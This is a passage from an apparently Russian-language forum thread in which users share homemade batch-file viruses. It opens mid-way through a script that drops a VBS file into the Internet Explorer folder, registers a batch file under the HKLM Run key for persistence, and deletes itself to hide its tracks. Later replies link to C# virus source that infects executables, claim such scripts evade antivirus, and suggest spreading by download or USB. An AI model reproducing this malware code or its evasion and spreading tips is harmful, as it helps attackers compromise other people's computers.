>>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs" echo objShellLink.WorkingDirectory = "C:\PathToYourProgram" >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs" echo objShellLink.Save >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs" echo loop >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs" *//Добовляем в файл WINCDPatch.bat Запуск создания ярлыков echo start "C:\Program Files\Internet Explorer\WINDCDPatch.vbs" >>"C:\Program Files\Internet Explorer\WINCDPatch.bat" *//Дабавляем файл WINCDPatch.bat в автозагрузку REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WINCDPatch /t REG_SZ /d C:\Program Files\Internet Explorer\WINCDPatch.bat *//Удаляем этот файл (палево) del %0 exit
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-02-07 00:52:58.413333
|
|
|
ZnakVoprosa
Сообщений: 37
Оценки: 0
Присоединился: 2010-01-31 19:36:50.236666
|
я не понимая прикола .BAT вирусов они же не жызнеспособны (тоесть не могут плодится) писать лутше на нормальном языке типа c# или Delphi с использованием WinApi если интересно вот ссылочка на исходник вируса на c# (работает только под .net) он токо заражает exe-шники и записывается в автозапуск http://letitbit.net/download/5825.fa55193fe0019efc1dc0dfee7/simple_vir_on_c_.rar.html
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-02-07 08:12:28.326666
|
|
|
Ltonid
Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
|
quote:
ORIGINAL: ZnakVoprosa я не понимая прикола .BAT вирусов они же не жызнеспособны (тоесть не могут плодится) писать лутше на нормальном языке типа c# или Delphi с использованием WinApi если интересно вот ссылочка на исходник вируса на c# (работает только под .net) он токо заражает exe-шники и записывается в автозапуск http://letitbit.net/download/5825.fa55193fe0019efc1dc0dfee7/simple_vir_on_c_.rar.html 1. bat не паляться антивирусами при правильном подходе, никогда не палятся. 2. Вирусы плодяться такими же простыми методами что и команды в бат. Например загрузка с сервера или копирование на флешку, все это можно реализовать в bat. Да и bat to exe ваще никто не отменял.
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-02-07 13:53:12.946666
|
|
|
CeNT
Сообщений: 201
Оценки: 0
Присоединился: 2007-12-25 14:35:58.483333
|
Это не вирусы а дерьмо.Уровень школоты!
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-02-07 13:59:32.830000
|
|
|
rgo
Сообщений: 7170
Оценки: 281
Присоединился: 2004-09-25 05:14:25
|
quote:
ORIGINAL: CeNT Это не вирусы а дерьмо.Уровень школоты! Ты можешь написать лучше? Покажи нам свой код, мы с громадным удовольствием оценим.
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-02-11 19:36:50.236666
|
|
|
Мустанг92
Сообщений: 148
Оценки: 0
Присоединился: 2010-01-20 22:36:50.793333
|
Вопрос не в тему,но как какую команду нужно использовать,чтобы при слиянии рег файла с реестром,не требовалось подтверждение?!
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-02-15 18:17:10.973333
|
|
|
Мечтающий
Сообщений: 11
Оценки: 0
Присоединился: 2008-12-08 14:59:43.646666
|
quote:
ORIGINAL: CeNT Это не вирусы а дерьмо.Уровень школоты! Было тяжелое детство?)
|
|
|
|
|